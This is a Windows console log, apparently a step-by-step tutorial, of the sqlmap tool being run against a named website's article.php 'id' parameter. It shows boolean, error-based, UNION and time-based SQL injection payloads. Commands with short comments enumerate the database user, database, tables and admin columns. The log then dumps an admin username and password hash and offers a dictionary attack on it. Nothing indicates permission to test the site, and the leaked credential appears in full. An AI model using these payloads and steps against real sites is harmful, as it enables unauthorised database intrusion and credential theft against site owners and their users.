D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |